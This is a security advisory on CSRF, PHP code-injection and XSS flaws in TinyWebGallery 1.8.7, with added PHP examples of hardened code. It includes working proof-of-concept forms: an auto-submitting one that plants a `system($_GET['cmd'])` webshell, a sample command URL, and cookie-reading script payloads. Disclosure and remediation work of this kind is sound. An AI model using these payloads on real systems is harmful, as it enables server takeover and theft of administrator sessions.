Multiple vulnerabilities in TinyWebGallery

Published: 2012-06-18 00:00:00 (vulners.com)

Advisory ID: HTB23093
Product: TinyWebGallery
Vendor: www.tinywebgallery.com
Vulnerable Version(s): 1.8.7 and probably prior
Tested Version: 1.8.7
Vendor Notification: 23 May 2012
Vendor Patch: 24 May 2012
Public Disclosure: 13 June 2012
Vulnerability Type: Cross-Site Request Forgery (CSRF), Arbitrary Code Execution, Cross-Site Scripting (XSS)
CVE References: CVE-2012-2930, CVE-2012-2931, CVE-2012-2932
CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Risk Level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )


Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in TinyWebGallery, which can be exploited to perform Cross-Site Request Forgery (CSRF), Arbitrary Code Execution and Cross-Site Scripting (XSS) attacks.

1) Cross-Site Request Forgery (CSRF) in TinyWebGallery: CVE-2012-2930

1.1 The application allows an authorized administrator to perform certain actions via HTTP requests without properly verifying the source of those requests. This can be exploited to add, delete or modify sensitive information, for example to add new users.

To exploit this vulnerability, an attacker must make a logged-in administrator open a malicious link in the browser.

2) Arbitrary Code Execution in TinyWebGallery: CVE-2012-2931

2.1 Input passed via the "user" POST parameter to /admin/index.php is not properly sanitised before being written to the ".htusers.php" file. This functionality is available to the gallery administrator only; therefore a malicious user may add arbitrary PHP code to this file via the CSRF attack vector described above.

The following CSRF PoC (Proof of Concept) inserts a very simple webshell into ".htusers.php":

<form action="http://[host]/admin/index.php?action=admin&dir=&order=name&srt=yes&tview=no&sview=yes&lang=en&action2=adduser" method="post" name="main" id="main">
<input type="hidden" name="confirm" value="true">
<input type="hidden" name="pass1" value="">
<input type="hidden" name="pass2" value="">
<input type="hidden" name="home_dir" value=".">
<input type="hidden" name="show_hidden" value="0">
<input type="hidden" name="no_access" value="^\.ht">
<input type="hidden" name="permissions" value="8">
<input type="hidden" name="upload_settings" value="15">
<input type="hidden" name="active" value="1">
<input type="hidden" name="user" value='")); system($_GET["cmd"]); $a=array(array("'>
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>

After a logged-in administrator visits a malicious page containing the above PoC, a webshell will be available at:

http://[host]/admin/index.php?cmd=ls -la;id;pwd;uname -a;
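To show the defect class behind 2.1 and its CSRF delivery, the following added example (a hypothetical reconstruction, not TinyWebGallery's own code; field names, the regex and the token field are assumptions) places a user record written into a PHP include by string concatenation beside a hardened write that validates the username, serialises with var_export() and requires a per-session CSRF token:

```php
<?php
// Added illustration, not TinyWebGallery's code: a user record written into a
// PHP include file by string concatenation becomes PHP code injection, and one
// way to harden that write. Field names and the token name are assumptions.

// VULNERABLE pattern: the raw "user" value is spliced into PHP source.
// A value such as  ")); system($_GET["cmd"]); $a=array(array("
// closes the string and array literal and leaves executable PHP in the file.
function write_users_unsafe(array $users, string $file): void {
    $src = '<?php $a=array(';
    foreach ($users as $u) {
        $src .= 'array("' . $u['user'] . '","' . $u['pass'] . '"),';
    }
    $src .= '); ?>';
    file_put_contents($src === '' ? $file : $file, $src);
}

// HARDENED: accept only a simple username, then let var_export() emit a
// correctly quoted PHP literal so no input is ever parsed as code.
function write_users_safe(array $users, string $file): void {
    foreach ($users as $u) {
        if (!preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $u['user'])) {
            throw new InvalidArgumentException('invalid username');
        }
    }
    $src = '<?php $a=' . var_export(array_values($users), true) . "; ?>";
    // Write to a temporary file and rename so a half-written include is never loaded.
    $tmp = $file . '.tmp';
    file_put_contents($tmp, $src, LOCK_EX);
    rename($tmp, $file);
}

// CSRF defence for the admin "adduser" action (assumes session_start() was
// called): the hidden form on an attacker's site cannot know this token.
function issue_csrf_token(): string {
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
    return $_SESSION['csrf'];
}

function check_csrf_token(): void {
    if (empty($_POST['csrf']) || empty($_SESSION['csrf'])
        || !hash_equals($_SESSION['csrf'], (string) $_POST['csrf'])) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
}
```

The token is emitted as a hidden field in the legitimate admin form and checked before any write to the user file; the username whitelist also rejects the quote and parenthesis characters the PoC depends on.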

3) Multiple XSS in TinyWebGallery: CVE-2012-2932

3.1 Input passed via the "selitems[]" POST parameter to /admin/index.php (when the "action" GET parameter is set to "copy", "chmod" or "arch") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator's browser session in the context of the affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/admin/index.php?action=copy" method="post" name="main" id="main">
<input type="hidden" name="selitems[]" value='"><script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>

<form action="http://[host]/admin/index.php?action=chmod" method="post" name="main" id="main">
<input type="hidden" name="selitems[]" value='<script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>

<form action="http://[host]/admin/index.php?action=arch" method="post" name="main" id="main">
<input type="hidden" name="selitems[]" value='"><script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>

3.2 Input passed via the "searchitem" POST parameter to /admin/index.php (when the "action" GET parameter is set to "search") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator's browser session in the context of the affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/admin/index.php?action=search" method="post" name="main" id="main">
<input type="hidden" name="searchitem" value='<script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>
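The PoCs in 3.1 and 3.2 hit two output contexts: a double-quoted attribute (the "copy" and "arch" cases, broken out of with "&gt;) and plain element text (the "chmod" and "search" cases). The following added example (not TinyWebGallery's code; function and field names are assumptions) reflects selitems[] and searchitem back to the administrator with output encoding that covers both contexts, and rejects non-string array members instead of casting them:

```php
<?php
// Added example, not TinyWebGallery's code: reflecting the selected items and
// the search term back to the administrator with context-appropriate encoding.

// Encode for HTML text and double-quoted attribute contexts. ENT_QUOTES also
// converts the single quote, so the output is safe in single-quoted attributes too.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// selitems[] arrives as an array; anything that is not a flat array of strings
// is dropped rather than being cast to "Array" or causing a notice.
function selected_items(array $post): array {
    $items = $post['selitems'] ?? [];
    if (!is_array($items)) {
        return [];
    }
    $out = [];
    foreach ($items as $item) {
        if (is_string($item)) {
            $out[] = $item;
        }
    }
    return $out;
}

// The confirmation page echoes each item inside an attribute (the "copy"/"arch"
// PoC context) and as element text (the "chmod" PoC context).
function render_items(array $items): string {
    $html = '';
    foreach ($items as $item) {
        $html .= '<input type="hidden" name="selitems[]" value="' . h($item) . '">'
               . '<li>' . h($item) . '</li>';
    }
    return $html;
}

function render_search(string $term): string {
    return '<p>Results for: ' . h($term) . '</p>';
}

// Demonstration with the advisory's own payloads; both come back inert.
$items = selected_items(['selitems' => ['"><script>alert(document.cookie);</script>', 'photo.jpg']]);
echo render_items($items);   // value="&quot;&gt;&lt;script&gt;..." cannot close the tag
echo render_search('<script>alert(document.cookie);</script>');
```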


Solution:

Upgrade to the latest TWG 1.8.8 build.

More Information:
http://www.tinywebgallery.com/forum/viewtopic.php?f=14&t=3274


References:

[1] High-Tech Bridge Advisory HTB23093 - https://www.htbridge.com/advisory/HTB23093 - Multiple vulnerabilities in TinyWebGallery.
[2] TinyWebGallery - http://www.tinywebgallery.com - The TinyWebGallery is a free php photo album / gallery that is very easy to install, extremely user friendly, does not need a database (uses xml files) but still has all the features you should expect and much more.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.


Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
